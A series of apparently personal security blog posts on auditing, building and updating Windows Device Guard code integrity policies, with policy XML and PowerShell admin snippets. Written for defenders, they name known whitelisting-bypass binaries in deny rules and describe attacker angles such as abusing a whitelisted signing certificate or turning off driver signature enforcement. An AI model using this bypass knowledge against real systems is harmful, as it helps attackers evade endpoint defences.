Another potential issue that I could speculatively anticipate is with the "Microsoft Windows Third Party Component CA 2012" certificate. My understanding is that this certificate is used for Microsoft to co-sign 3rd party software. Because this certificate seems to be used so heavily by 3rd party vendors, it potentially opens the door to permit a large amount vulnerable software. To mitigate this, you can use the WHQLPublisher or WHQLFilePublisher rule level when creating a code integrity policy. When those options are selected, if an OEM vendor name is associated with a drivers, a CertOemId attribute will be applied to signers. For example, you could use this feature to whitelist only Apple drivers that are cosigned with the "Microsoft Windows Third Party Component CA 2012" certificate.

ID_SIGNINGSCENARIO_WINDOWS


The following user-mode code signers are whitelisted (based on their presence in AllowedSigners):

- ID_SIGNER_S_1_1_0_0_0_0_0_0
   Name: Microsoft Windows Production PCA 2011
   TBS: 4E80BE107C860DE896384B3EFF50504DC2D76AC7151DF3102A4450637A032146
- ID_SIGNER_S_1_1_0
   Name: Intel External Basic Policy CA
   TBS: 53B052BA209C525233293274854B264BC0F68B73
   CertPublisher: Intel(R) Intel_ICG
- ID_SIGNER_S_2_1_0
   Name: Microsoft Windows Third Party Component CA 2012
   TBS: CEC1AFD0E310C55C1DCC601AB8E172917706AA32FB5EAF826813547FDF02DD46
- ID_SIGNER_S_4_1_0_0_0
   Name: Matthew Graeber
   TBS: B1554C5EEF15063880BB76B347F2215CDB5BBEFA1A0EBD8D8F216B6B93E8906A
- ID_SIGNER_S_19_1_0
   Name: Intel External Basic Policy CA
   TBS: 53B052BA209C525233293274854B264BC0F68B73
   CertPublisher: Intel(R) pGFX
- ID_SIGNER_S_20_1_0
   Name: iKGF_AZSKGFDCS
   TBS: 32656594870EFFE75251652A99B906EDB92D6BB0
   CertPublisher: IntelVPGSigning2016
- ID_SIGNER_S_4E_1_0
   Name: Microsoft Windows Third Party Component CA 2012
   TBS: CEC1AFD0E310C55C1DCC601AB8E172917706AA32FB5EAF826813547FDF02DD46
- ID_SIGNER_S_65_1_0
   Name: VeriSign Class 3 Code Signing 2010 CA
   TBS: 4843A82ED3B1F2BFBEE9671960E1940C942F688D
   CertPublisher: Logitech
- ID_SIGNER_S_35C_1_0_0_0_0_0_0
   Name: Microsoft Code Signing PCA
   TBS: 27543A3F7612DE2261C7228321722402F63A07DE
- ID_SIGNER_S_35F_1_0_0_0_0_0_0
   Name: Microsoft Code Signing PCA 2011
   TBS: F6F717A43AD9ABDDC8CEFDDE1C505462535E7D1307E630F9544A2D14FE8BF26E
- ID_SIGNER_S_1EA5_1_0_0_0_0_0_0
   Name: Microsoft Code Signing PCA 2010
   TBS: 121AF4B922A74247EA49DF50DE37609CC1451A1FE06B2CB7E1E079B492BD8195
- ID_SIGNER_S_2316_1_0_0_0_0_0_0
   Name: Microsoft Windows Verification PCA
   TBS: 265E5C02BDC19AA5394C2C3041FC2BD59774F918
- ID_SIGNER_S_3D8C_1_0_0_0_0_0_0
   Name: Microsoft Code Signing PCA
   TBS: 7251ADC0F732CF409EE462E335BB99544F2DD40F

The following user-mode code blacklist rules are present (based on their presence inDeniedSigners):

- ID_SIGNER_F_1_0_0_1_0_0
   Name: Microsoft Code Signing PCA
   TBS: 27543A3F7612DE2261C7228321722402F63A07DE
   CertPublisher: Microsoft Corporation
   Associated files:
     1) OriginalFileName: cdb.exe
        MinimumFileVersion: 99.0.0.0
     2) OriginalFileName: kd.exe
        MinimumFileVersion: 99.0.0.0
     3) OriginalFileName: windbg.exe
        MinimumFileVersion: 99.0.0.0
     4) OriginalFileName: MSBuild.exe
        MinimumFileVersion: 99.0.0.0
- ID_SIGNER_F_2_0_0_1_0_0
   Name: Microsoft Code Signing PCA 2010
   TBS: 121AF4B922A74247EA49DF50DE37609CC1451A1FE06B2CB7E1E079B492BD8195
   CertPublisher: Microsoft Corporation
   Associated files:
     1) OriginalFileName: cdb.exe
        MinimumFileVersion: 99.0.0.0
     2) OriginalFileName: kd.exe
        MinimumFileVersion: 99.0.0.0
     3) OriginalFileName: windbg.exe
        MinimumFileVersion: 99.0.0.0
- ID_SIGNER_F_3_0_0_1_0_0
   Name: Microsoft Code Signing PCA 2011
   TBS: F6F717A43AD9ABDDC8CEFDDE1C505462535E7D1307E630F9544A2D14FE8BF26E
   CertPublisher: Microsoft Corporation
   Associated files:
     1) OriginalFileName: MSBuild.exe
        MinimumFileVersion: 99.0.0.0
     2) OriginalFileName: csi.exe
        MinimumFileVersion: 99.0.0.0
- ID_SIGNER_F_4_0_0_1_0_0
   Name: Microsoft Windows Production PCA 2011
   TBS: 4E80BE107C860DE896384B3EFF50504DC2D76AC7151DF3102A4450637A032146
   CertPublisher: Microsoft Windows
   Associated files:
     1) OriginalFileName: MSBuild.exe
        MinimumFileVersion: 99.0.0.0

Analysis/recommendations: User-mode rules

Whoever created this policy is clearly mindful of and actively blocking known UMCI bypasses. The downside is that there have since been additional bypasses reported publicly - e.g. dnx.exe from Matt Nelson (@enigma0x3). As a defender employing application whitelisting solutions, it is critical to stay up to date on current bypasses. If not, you're potentially one trusted binary/script away from further compromise.

You may have noticed what seems like an arbitrary selection of "99.0.0.0" for the minimum file version. You can interpret this as any of the files with matching block rules that have a version number less than 99.0.0.0 will be blocked. It is fairly reasonable to assume that a binary won't exceed version 99.0.0.0 but I've recently seen several files in the hundreds so I now recommend setting MinimumFileVersion for each FilePublisher block rule to 999.999.999.999. Unfortunately, at the time of writing, you cannot block an executable by only its signature and OriginalFileName. I hope this will change in the future.

As for the whitelisted signers, I wouldn't have a ton to recommend. As an attacker though, I might try to find executables/scripts signed with the "Matthew Graeber" certificate. This sounds like it would be an easy thing to do but Microsoft actually does not provide an official means of associating an executable or script to a CI policy rule. Ideally, Microsoft would provide a Test-CIPolicy cmdlet similar to the Test-AppLockerPolicy cmdlet. I'm in the process of writing one now.

Overall, there are no signers that stick out to me as worthy of additional investigation. Obviously, Microsoft signers will need to be permitted (and in a non-restrictive) fashion if OS updates are to be accepted. It appears as thought there is some required Intel software present on the system. If anything, I might try to determine why the Intel software is required.


UpdatePolicySigners analysis

There is only a single UpdatePolicySigner: "Matthew Graeber". So while the effort was made to permit that code signing certificate to sign the policy, the "Enabled:Unsigned System Integrity Policy" policy rule was still set. So considering the intent to sign the policy was there, I would certainly recommend that the "Enabled:Unsigned System Integrity Policy" rule be removed and to start enforcing signed policies. As an attacker, I would also look for the presence of this code signing certificate on the same system. It should go without saying that a whitelisted code signing certificate should never be present on a Device Guard-enabled system that whitelists that certificate.

HvciOptions analysis

HvciOptions is set to "1" indicating that it is enabled and that the system will benefit from additional kernel exploitation protections. I cannot recommend setting HVCI to strict mode (3) yet as it is almost certain that there will be some drivers that are not compliant for strict mode.

Conclusion

I'll state again that this analysis has been subjective. An effective policy on one system that has a particular purpose likely won't be effective on another piece of hardware with a separate purpose. Getting CI policy configuration "right" is indeed a challenge. It takes experience, knowledge of the CI policy schema, and it requires that you apply an attackers mindset when auditing a policy.

It is worth noting that even despite having an extremely locked down policy, the OS is still at the mercy of UMCI bypasses. For this very reason, Device Guard should be merely a component of a layered defense. It is certainly recommended that anti-malware solutions be installed side by side with Device Guard. For example, in a post-exploitation scenario, Device Guard will do nothing about the exfiltration of sensitive data using a simple batch script or PowerShell script operating in constrained language mode.

I will leave the comments section open to encourage discussion about your thoughts on CI policy assessment and how you think this example policy might have additional vulnerabilities. I feel as though I'm breaking new ground here since there is no other information available regarding Device Guard policy audit methodology so I am certainly open to candid feedback.

On the Effectiveness of Device Guard User Mode Code Integrity

23 November 2016 at 00:19
Is a security feature with known bypasses pointless?

I felt compelled to answer to this question after seeing several tweets recently claiming that Device Guard User Mode Code Integrity (UMCI) is a pointless security mechanism considering all of the recently reported bypasses. Before specifically diving into UMCI and its merits (or lack thereof), let’s use an analogy in the physical world to put things into perspective - a door.

Consider the door at the front of your home or business. This door helps serve as the primary mechanism to prevent intruders from breaking, entering, and stealing your assets. Let's say it's a solid wood door for the sake of the analogy. How might an attacker go about bypassing it?

  • They could pick the lock
  • They could compromise the latch with a shimming device
  • They could chop the door down with an ax
  • They could compromise the door and the hinges with a battering ram

Now, there are certainly better doors out there. You could purchase a blast door and have it be monitored with a 24/7 armed guard. Is that measure realistic? Maybe. It depends on the value of the assets you want to protect. Realistically, it's probably not worth your money since you suspect that a full frontal assault of enemy tanks is not a part of your threat model.

Does a determined attacker ultimately view the door as a means of preventing them from gaining access to your valuable assets? Of course not. Does the attacker even need to bypass the door? Probably not. They could also:

  • Go through the window
  • Break through a wall
  • Hide in the store during business hours and wait for everyone to leave
  • Submit their resume, get a job, develop trust, and slowly, surreptitiously steal your assets

So, will a door prevent breaches in all cases? Absolutely not. Will it prevent or deter an attacker lacking a certain amount of skill from breaking and entering? Sure. Other than preventing the elements from entering your store, does the locked door serve a purpose? Of course. It is a preventative mechanism suitable for the threat model that you choose to accept or mitigate against. The door is a baseline preventative mechanism employed in conjunction with a layered defense consisting of other preventative (reinforced, locked windows) and detective (motion sensors, video cameras, etc.) measures.




Now let's get back to the comfortable world of computers. Is a preventative security technology completely pointless if there are known bypasses? Specifically, let’s focus on Device Guard user mode code integrity (UMCI) as it’s received a fair amount of attention as of late. Considering all of the public bypasses posted, does it still serve a purpose? I won't answer that question using absolutes. Let me make a few proposals and let you, the reader decide. Consider the following:

1) A bypass that applies to Device Guard UMCI is extremely likely to apply to all application whitelisting solutions. I would argue that Device Guard UMCI goes above and beyond other offerings. For example, UMCI places PowerShell (one of the largest user-mode attack surfaces) into constrained language mode, preventing PowerShell from being used to execute arbitrary, unsigned code. Other whitelisting solutions don’t even consider the attack surface posed by PowerShell. Device Guard UMCI also applies code integrity rules to DLLs. There is no way around this. Other solutions allow for DLL whitelisting but not by default.

2) Device Guard UMCI, as with any whitelisting solution, is extremely effective against post-exploitation activities that are not aware of UMCI bypasses. The sheer amount of attacks that app-whitelisting prevents without any fancy machine learning is astonishing. I can say first hand that every piece of “APT” malware I reversed in a previous gig would almost always drop an unsigned binary to disk. Even in the cases where PowerShell was used, .NET methods were used heavily - something that constrained language mode would have outright prevented.

3) The majority of the "misplaced trust" binaries (e.g. MSBuild.exe, cdb.exe, dnx.exe, rcsi.exe, etc.) can be blocked with Device Guard code integrity policy updates. Will there be more bypass binaries? Of course. Again, these binaries will also likely circumvent all app-whitelisting solutions as well. Does it require an active effort to stay on top of all the bypasses as a defender? Yes. Deal with it.

Now, I along with awesome people like Casey Smith (@subtee) and Matt Nelson (@enigma0x3) have reported our share of UMCI bypasses to Microsoft for which there is no code integrity policy mitigation. We have been in the trenches and have seen first hand just how bad some of the bypasses are. We are desperately holding out hope that Microsoft will come through, issue CVEs, and apply fixes for all of the issues we’ve reported. If they do, that will set a precedent and serve as proof that they are taking UMCI seriously. If not, I will start to empathize a bit more with those who claim that Device Guard is pointless. After all, we’re starting to see more attackers “live off the land” and leverage built-in tools to host their malware. Vendors need to be taking that seriously.

Ultimately, Device Guard UMCI is just another security feature that a defender should consider from a cost/benefit analysis based on threats faced and the assets they need to defend. It will always be vulnerable to bypasses, but raises the baseline bar of security. Going back to the analogy above, a door can always be bypassed but you should be able to detect an attacker breaking in and laying their hands on your valuable assets. So obviously, you would want to use additional security solutions along with Device Guard - e.g. Windows Event Forwarding, an anti-malware solution, and to perform periodic compromise/hunt assessments.

What I’m about to say might be scandalous but I sincerely think that application whitelisting should the new norm. You probably won’t encounter any organizations that don’t employ an anti-malware solution despite the innumerable bypasses. These days, anti-malware solutions are assumed to be a security baseline as I think whitelisting should be despite the innumerable bypasses that will surface over time. Personally, I would ask any defender to seriously consider it and I would encourage all defenders to hold whitelisting solution vendors' feet to the fire and hold them accountable when there are bypasses for which there is no obvious mitigation.


I look forward to your comments here or in a lively debate on Twitter!

Code Integrity on Nano Server: Tips/Gotchas

28 November 2016 at 15:57
Although it's not explicitly called out as being supported in Microsoft documentation, it turns out that you can deploy a code integrity policy to Nano Server, enabling enforcement of user and kernel-mode code integrity. It is refreshing to know that code integrity is supported across all modern Windows operating systems now (Win 10 Enterprise, Win 10 IoT, and Server 2016 including Nano Server) despite the fact that Microsoft doesn't make that fact well known. Now, while it is possible to enforce code integrity on Nano Server, you should be aware of some of the caveats which I intend to enumerate in this post.

Code Integrity != Device Guard

Do note that until now, there has been no mention of Device Guard. This was intentional. Nano Server does not support Device Guard - only code integrity (CI), a subset of the supported Device Guard features. So what's the difference you ask?

  • There are no ConfigCI cmdlets. These cmdlets are what allow you to build code integrity policies. I'm not going to try to speculate around the rationale for not including them in Nano Server but I doubt you will ever see them. In order to build a policy, you will need to build it from a system that does have the ConfigCI cmdlets.
  • Because there are no ConfigCI cmdlets, you cannot use the -Audit parameter of Get-SystemDriver and New-CIPolicy to build a policy based on blocked binaries in the Microsoft-Windows-CodeIntegrity/Operational event log. If you want to do this (an extremely realistic scenario), you have to get comfortable pulling out and parsing blocked binary paths yourself using Get-WinEvent. When calling Get-WinEvent, you'll want to do so from an interactive PSSession rather than calling it from Invoke-Command. By default, event log properties don't get serialized and you need to access the properties to pull out file paths.
  • In order to scan files and parse Authenticode and catalog signatures, you will need to either copy the target files from a PSSession (i.e. Copy-Item -FromSession) or mount Nano Server partitions as a file share. You will need to do the same thing with the CatRoot directory - C:\Windows\System32\CatRoot. Fortunately, Get-SystemDriver and New-CIPolicy support explicit paths using the -ScanPath and -PathToCatroot parameters. It may not be obvious, but you have to build your rules off the Nano Server catalog signers, not some other system because your other system is unlikely to contain the hashes of binaries present on Nano Server.
  • There is no Device Guard WMI provider (ROOT\Microsoft\Windows\DeviceGuard). Without this WMI class, it is difficult to audit code integrity enforcement status at scale remotely.
  • There is no Microsoft-Windows-DeviceGuard/Operational event log so there is no log to indicate when a new CI policy was deployed. This event log is useful for alerting a defender to code integrity policy and virtualization-based security (VBS) configuration tampering.
  • Since Nano Server does not have Group Policy, there is no way to configure a centralized CI policy path, VBS settings, or Credential Guard settings. I still need to dig in further to see if any of these features are even supported in Nano Server. For example, I would really want Nano Server to support UEFI CI policy protection.
  • PowerShell is not placed into constrained language mode even with user-mode code integrity (UMCI) enforcement enabled. Despite PowerShell running on .NET Core, you still have a rich reflection API to interface with Win32 - i.e. gain arbitrary unsigned code execution. With PowerShell not in constrained language mode (it's in FullLanguage mode), this means that signature validation won't be enforced on your scripts. I tried turning on constrained language mode by setting the __PSLockdownPolicy system environment variable, but PowerShell Core doesn't seem to acknowledge it. Signature enforcement of scripts/modules in PowerShell is independent of Just Enough Administration (JEA) but you should also definitely consider using JEA in Nano Server to enforce locked down remote session configurations.

Well then what is supported on Nano Server? Not all is lost. You still get the following:

  • The Microsoft-Windows-CodeIntegrity/Operational event log so you can view which binaries were blocked per code policy.
  • You still deploy SIPolicy.p7b to C:\Windows\System32\CodeIntegrity. When SIPolicy.p7b is present in that directory, Nano Server will begin enforcing the rules after a reboot.

Configuration/deployment/debugging tips/tricks

I wanted to share with you the way in which I dealt with some of the headaches involved in configuring, deploying, and debugging issues associated with code integrity on Nano Server.

Event log parsing

Since you don't get the -Audit parameter in the Get-SystemDriver and New-CIPolicy cmdlets, if you choose to base your policy off audit logs, you will need to pull out blocked binary paths yourself. When in audit mode, binaries that would have been blocked generate EID 3076 events. The path of the binary is populated via the second event parameter. The paths need to be normalized and converted to a proper file path from the raw device path. Here is some sample code that I used to obtain the paths of blocked binaries from the event log:

$BlockedBinaries = Get-WinEvent -LogName 'Microsoft-Windows-CodeIntegrity/Operational' -FilterXPath '*[System[EventID=3076]]' | ForEach-Object {

    $UnnormalizedPath = $_.Properties[1].Value.ToLower()


    $NormalizedPath = $UnnormalizedPath


    if ($UnnormalizedPath.StartsWith('\device\harddiskvolume3')) {

        $NormalizedPath = $UnnormalizedPath.Replace('\device\harddiskvolume3', 'C:')

    } elseif ($UnnormalizedPath.StartsWith('system32')) {

        $NormalizedPath = $UnnormalizedPath.Replace('system32', 'C:\windows\system32')

    }


    $NormalizedPath

} | Sort-Object -Unique


Working through boot failures

There were times when the system often wouldn't boot because my kernel-mode rules were too strict when in enforcement mode. For example, when I neglected to add hal.dll to the whitelist, obviously, the OS wouldn't boot. While I worked through these problems, I would boot into the advanced boot options menu (by pressing F8) and disable driver signature enforcement for that session. This was an easy workaround to gain access to the system without having to boot from external WinPE media to redeploy a better, bootable CI policy. Note that the advanced boot menu is only made available to you if the "Enabled:Advanced Boot Options Menu" policy rule option is present in your CI policy. Obviously, disabling driver signature enforcement is a way to completely circumvent kernel-mode code integrity enforcement.

Completed code integrity policy

After going through many of the phases of an initial deny-all approach as described in my previous post on code integrity policy development, this is the relatively locked CI policy that I got to work on my Nano Server bare metal install (Intel NUC):

<?xml version="1.0" encoding="utf-8"?>

<SiPolicy xmlns="urn:schemas-microsoft-com:sipolicy">

  <VersionEx>1.0.0.0</VersionEx>

  <PolicyTypeID>{A244370E-44C9-4C06-B551-F6016E563076}</PolicyTypeID>

  <PlatformID>{2E07F7E4-194C-4D20-B7C9-6F44A6C5A234}</PlatformID>

  <Rules>

    <Rule>

      <Option>Enabled:Unsigned System Integrity Policy</Option>

    </Rule>

    <Rule>

      <Option>Enabled:Advanced Boot Options Menu</Option>

    </Rule>

    <Rule>

      <Option>Enabled:UMCI</Option>

    </Rule>

    <Rule>

      <Option>Disabled:Flight Signing</Option>

    </Rule>

  </Rules>

  <!--EKUS-->

  <EKUs />

  <!--File Rules-->

  <FileRules>

    <!--This is the only non-OEM, 3rd party driver I needed for my Intel NUC-->

    <!--I was very specific with this driver rule but flexible with all other MS drivers.-->

    <FileAttrib ID="ID_FILEATTRIB_F_1" FriendlyName="e1d64x64.sys FileAttribute" FileName="e1d64x64.sys" MinimumFileVersion="12.15.22.3" />

  </FileRules>

  <!--Signers-->

  <Signers>

    <Signer ID="ID_SIGNER_F_1" Name="Intel External Basic Policy CA">

      <CertRoot Type="TBS" Value="53B052BA209C525233293274854B264BC0F68B73" />

      <CertPublisher Value="Intel(R) INTELNPG1" />

      <FileAttribRef RuleID="ID_FILEATTRIB_F_1" />

    </Signer>

    <Signer ID="ID_SIGNER_F_2" Name="Microsoft Windows Third Party Component CA 2012">

      <CertRoot Type="TBS" Value="CEC1AFD0E310C55C1DCC601AB8E172917706AA32FB5EAF826813547FDF02DD46" />

      <CertPublisher Value="Microsoft Windows Hardware Compatibility Publisher" />

      <FileAttribRef RuleID="ID_FILEATTRIB_F_1" />

    </Signer>

    <Signer ID="ID_SIGNER_S_3" Name="Microsoft Windows Production PCA 2011">

      <CertRoot Type="TBS" Value="4E80BE107C860DE896384B3EFF50504DC2D76AC7151DF3102A4450637A032146" />

      <CertPublisher Value="Microsoft Windows" />

    </Signer>

    <Signer ID="ID_SIGNER_S_4" Name="Microsoft Code Signing PCA">

      <CertRoot Type="TBS" Value="27543A3F7612DE2261C7228321722402F63A07DE" />

      <CertPublisher Value="Microsoft Corporation" />

    </Signer>

    <Signer ID="ID_SIGNER_S_5" Name="Microsoft Code Signing PCA 2011">

      <CertRoot Type="TBS" Value="F6F717A43AD9ABDDC8CEFDDE1C505462535E7D1307E630F9544A2D14FE8BF26E" />

      <CertPublisher Value="Microsoft Corporation" />

    </Signer>

    <Signer ID="ID_SIGNER_S_6" Name="Microsoft Windows Production PCA 2011">

      <CertRoot Type="TBS" Value="4E80BE107C860DE896384B3EFF50504DC2D76AC7151DF3102A4450637A032146" />

      <CertPublisher Value="Microsoft Windows Publisher" />

    </Signer>

    <Signer ID="ID_SIGNER_S_2" Name="Microsoft Windows Production PCA 2011">

      <CertRoot Type="TBS" Value="4E80BE107C860DE896384B3EFF50504DC2D76AC7151DF3102A4450637A032146" />

      <CertPublisher Value="Microsoft Windows" />

    </Signer>

    <Signer ID="ID_SIGNER_S_1" Name="Microsoft Code Signing PCA 2010">

      <CertRoot Type="TBS" Value="121AF4B922A74247EA49DF50DE37609CC1451A1FE06B2CB7E1E079B492BD8195" />

    </Signer>

  </Signers>

  <!--Driver Signing Scenarios-->

  <SigningScenarios>

    <SigningScenario Value="131" ID="ID_SIGNINGSCENARIO_DRIVERS_1" FriendlyName="Kernel-mode rules">

      <ProductSigners>

        <AllowedSigners>

          <AllowedSigner SignerId="ID_SIGNER_S_1" />

          <AllowedSigner SignerId="ID_SIGNER_S_2" />

          <AllowedSigner SignerId="ID_SIGNER_F_1" />

          <AllowedSigner SignerId="ID_SIGNER_F_2" />

        </AllowedSigners>

      </ProductSigners>

    </SigningScenario>

    <SigningScenario Value="12" ID="ID_SIGNINGSCENARIO_WINDOWS" FriendlyName="User-mode rules">

      <ProductSigners>

        <AllowedSigners>

          <AllowedSigner SignerId="ID_SIGNER_S_3" />

          <AllowedSigner SignerId="ID_SIGNER_S_4" />

          <AllowedSigner SignerId="ID_SIGNER_S_5" />

          <AllowedSigner SignerId="ID_SIGNER_S_6" />

        </AllowedSigners>

      </ProductSigners>

    </SigningScenario>

  </SigningScenarios>

  <UpdatePolicySigners />

  <CiSigners>

    <CiSigner SignerId="ID_SIGNER_S_3" />

    <CiSigner SignerId="ID_SIGNER_S_4" />

    <CiSigner SignerId="ID_SIGNER_S_5" />

    <CiSigner SignerId="ID_SIGNER_S_6" />

  </CiSigners>

  <HvciOptions>0</HvciOptions>

</SiPolicy


I conducted the following phases to generate this policy:
  1. Generate a default, deny-all policy by calling New-CIPolicy on an empty directory. I also increased the size of the Microsoft-Windows-CodeIntegrity/Operational to 20 MB to account for the large number of 3076 events I would expect while deploying the policy in audit mode. I also just focused on drivers for this phase so I didn't initially include the "Enabled:UMCI" option. My approach moving forward will be to focus on just drivers and then user-mode rules so as to minimize unnecessary cross-pollination between rule sets.
  2. Reboot and start pulling out blocked driver paths from the event log. I wanted to use the WHQLFilePublisher rule for the drivers but apparently, none of them were WHQL signed despite some of them certainly appearing to be WHQL signed. I didn't spend too much time diagnosing this issue since I have never been able to successfully get the WHQLFilePublisher rule to work. Instead, I resorted to the FilePublisher rule.
  3. After I felt confident that I had a good driver whitelist, I placed the policy into enforcement mode and rebooted. What resulted was nonstop boot failures. It turns out that if you're whitelisting individual drivers, critical drivers won't show up in the event log in audit mode like ntoskrnl.exe and hal.dll. So I explicitly added rules for them and Nano Server still wouldn't boot. What made things worse is that even if I placed the policy back into audit mode, there were no new blocked driver entries but the system still refused to boot. I rolled the dice and posited that there might be an issue with certificate chain validation at boot time so I created a PCACertificate rule for ntoskrnl.exe (The "Microsoft Code Signing PCA 2010" rule). This miraculously did the trick at the expense of creating a more permissive policy. In the end, I ended up with roughly the equivalent of a Publisher ruleset on my drivers with the exception of my Intel NIC driver.
  4. I explicitly made a FilePublisher rule for my Intel NIC driver as it was the only 3rd part, non-OEM driver I had to add when creating my Nano Server image. I don't need to allow any other code signed by Intel so I explicitly only allow that one driver.
  5. After I got Nano Server to boot, I started working on user-mode rules. This process was relatively straightforward and I used the Publisher rule for user-mode code.
  6. After using Nano Server under audit mode with my new rule set and not seeing any legitimate binaries that would have been blocked, I felt confident in the policy and placed it into audit mode and I haven't run into any issues and I'm using Nano Server as a Hyper-V server (i.e. with the "Compute" package).
I still need to get around to adding my code-signing certificate as an authorized policy signer, sign the policy, and remove "Enabled:Unsigned System Integrity Policy". Overall though, despite the driver issues, I'm fairly content with how well locked down my policy is. It essentially only allows a subset of critical Microsoft code to execute with the exception of the Intel driver which has a very specific file/signature-based rule.

Conclusion

I'm not sure if we'll see improved code integrity or Device Guard support for Nano Server in the future, but something is at least better than nothing. As it stands though, if you are worried about the execution of untrusted PowerShell code, unfortunately, UMCI does nothing to protect you on Nano Server. Code integrity still does a great job of blocking untrusted compiled binaries though - a hallmark of the vast majority of malware campaigns. Nano Server opens up a whole new world of possibilities from a management and malware perspective. I'm personally very interested to see how attackers will try to evolve and support their operations in a Nano Server environment. Fortunately, the combination of Windows Defender and code integrity support offer a solid security baseline.

Updating Device Guard Code Integrity Policies

30 December 2016 at 23:01
In previous posts about Device Guard, I spent a lot of time talking about initial code integrity (CI) configurations and bypasses. What I haven't covered until now however is an extremely important topic: how does one effectively install software and update CI policies according? In this post, I will walk you through how I got Chrome installed on my Surface Book running on an enforced Device Guard code integrity policy.

The first questions I posed to myself were:
  1. Should I place my system into audit mode, install the software, and base an updated policy on CodeIntegrity event log entries?
  2. Or should I install the software on a separate, non Device Guard protected system, analyze the file footprint, develop a policy based on the installed files, deploy, and test?
My preference is option #2 as I would prefer to not place a system back into audit mode if I can avoid it. That said, audit mode would yield the most accurate results as it would tell you exactly which binaries would have been blocked that you would want to base whitelist rules off of. In this case, there's no right or wrong answer. My decision to go with option #2 was to base my rules solely off binaries that execute post-installation, not during installation. My mantra with whitelisting is to be as restrictive as is reasonable.

So how did I go about beginning to enumerate the file footprint of Chrome?
  1. I opened Chrome, ran it as I usually would, and used PowerShell to enumerate loaded modules.
  2. I also happened to know that the Google updater runs as a scheduled task so I wanted to obtain the binaries executed via scheduled tasks as well.
I executed the following to get a rough sense of where Chrome files were installed:

(Get-Process -Name *Chrome*).Modules.FileName | Sort-Object -Unique

(Get-ScheduledTask -TaskName *Google*).Actions.Execute | Sort-Object -Unique


To my surprise and satisfaction, Google manages to house nearly all of its binaries in C:\Program Files (x86)\Google. This allows for a great starting point for building Chrome whitelist rules.

Next, I had to ask myself the following:
  1. Am I okay with whitelisting anything signed by Google?
  2. Do I only want to whitelist Chrome? i.e. All Chrome-related EXEs and all DLLs they rely upon.
  3. I will probably want want Chrome to be able to update itself without Device Guard getting in the way, right?
While I like the idea of whitelisting just Chrome, there are going to be some potential pitfalls. By whitelisting just Chrome, I would need to be aware of every EXE and DLL that Chrome requires to function. I can certainly do that but it would be a relatively work-intensive effort. With that list, I would then create whitelist rules using the FilePublisher file rule level. This would be great initially and it would potentially be the most restrictive strategy while allowing Chrome to update itself. The issue is that what happens when Google decides to include one or more additional DLLs in the software installation? Device Guard will block them and I will be forced to update my policy again. I'm all about applying a paranoid mindset to my policy but at the end of the day, I need to get work done other than constantly updating CI policies.

So the whitelist strategy I choose in this instance is to allow code signed by Google and to allow Chrome to update itself. This strategy equates to using the "Publisher" file rule level - "a combination of the PcaCertificate level (typically one certificate below the root) and the common name (CN) of the leaf certificate. This rule level allows organizations to trust a certificate from a major CA (such as Symantec), but only if the leaf certificate is from a specific company (such as Intel, for device drivers)."

I like the "Publisher" file rule level because it offers the most flexibility, longevity for a specific vendor's code signing certificate. If you look at the certificate chain for chrome.exe, you will see that the issuing PCA (i.e. the issuer above the leaf certificate) is Symantec. Obviously, we wouldn't want to whitelist all code signed by certs issued by Symantec but I'm okay allowing code signed by Google who received their certificate from Symantec.

Certificate chain for chrome.exe
So now I'm ready to create the first draft of my code integrity rules for Chrome.

I always start by creating a FilePublisher rule set for the binaries I want to whitelist because it allows me to associate what binaries are tied to their respective certificates.

$GooglePEs = Get-SystemDriver -ScanPath 'C:\Program Files (x86)\Google' -UserPEs

New-CIPolicy -FilePath Google_FilePub.xml -DriverFiles $GooglePEs -Level FilePublisher -UserPEs


What resulted was the following ruleset. Everything looked fine except for a single Microsoft rule generated which was associated with d3dcompiler_47.dll. I looked in my master rule policy and I already had this rule. Me being obsessive compulsive wanted a pristine ruleset including only Google rules. This is good practice anyway once you get in the habit of managing large whitelist rulesets. You'll want to keep separate policy XMLs for each whitelisting scenario you run into and then merge accordingly. After removing the MS binary from the list, what resulted was a much cleaner ruleset (Publisher applied this time) consisting of only two signer rules.

$OnlyGooglePEs = $GooglePEs | ? { -not $_.FriendlyName.EndsWith('d3dcompiler_47.dll') }

New-CIPolicy -FilePath Google_Publisher.xml -DriverFiles $OnlyGooglePEs -Level Publisher -UserPEs


So now, all I should need to do is merge the new rules into my master ruleset, redeploy, reboot, and if all works well, Chrome should install and execute without issue.

$MasterRuleXml = 'FinalPolicy.xml'

$ChromeRules = New-CIPolicyRule -DriverFiles $OnlyGooglePEs -Level Publisher

Merge-CIPolicy -OutputFilePath FinalPolicy_Merged.xml -PolicyPaths $MasterRuleXml -Rules $ChromeRules

ConvertFrom-CIPolicy -XmlFilePath .\FinalPolicy_Merged.xml -BinaryFilePath SIPolicy.p7b

# Finally, on the Device Guard system, replace the existing

# SIPolicy.p7b with the one that was just generated and reboot.


One thing I neglected to account for was the initial Chrome installer binary. I could have incorporated the binary into this process but I wanted to try my luck that Google used the same certificates to sign the installer binary. To my luck, they did and everything installed and executed perfectly. I would consider myself lucky in this case because I selected a software publisher (Google) who employs decent code signing practices.

Conclusion

In future blog posts, I will document my experiences deploying software that doesn't adhere to proper signing practices or doesn't even sign their code. Hopefully, the Google Chrome case study will, at a minimum, ease you into the process of updating code integrity policies for new software deployments.

The bottom line is that this isn't an easy process. Are there ways in which Microsoft could improve the code integrity policy generation/update/deployment/auditing experience? Absolutely! Even if they did though, the responsibility ultimately lies on you to make informed decisions about what software you trust and how you choose to enforce that trust!

PowerShell is Not Special - An Offensive PowerShell Retrospective

5 January 2017 at 23:35
“PowerShell is not special.”

During Jared Haight’s excellent DerbyCon presentation, he uttered this blasphemous sentence. As someone who has invested the last five years of his life learning and mastering PowerShell, at a surface level, it was easy to dismiss such a claim. However, I’ve done a lot of introspection about my investment in offensive PowerShell and the more I thought about it, the more I began to realize that PowerShell really isn’t that special! Before you bring out the torches and pitchforks, allow me apply context.

My first exposure to PowerShell was from Dave Kennedy and Josh Kelley during their DEF CON presentation – PowerShell OMFG. Initially, I considered PowerShell to be amusing from a security perspective. I was just getting my start in infosec, however, and I had a lot of other things that I needed to focus on. Not long after that talk, Chris Campbell (@obscuresec) then took a keen interest in PowerShell and heavily advocated that we start using it on our team. My obsession for PowerShell wasn’t solidified until I realized that it could be used as a shellcode runner. When I realized that there really wasn’t anything PowerShell couldn’t do, my interest in and promotion of offensive PowerShell was truly realized.

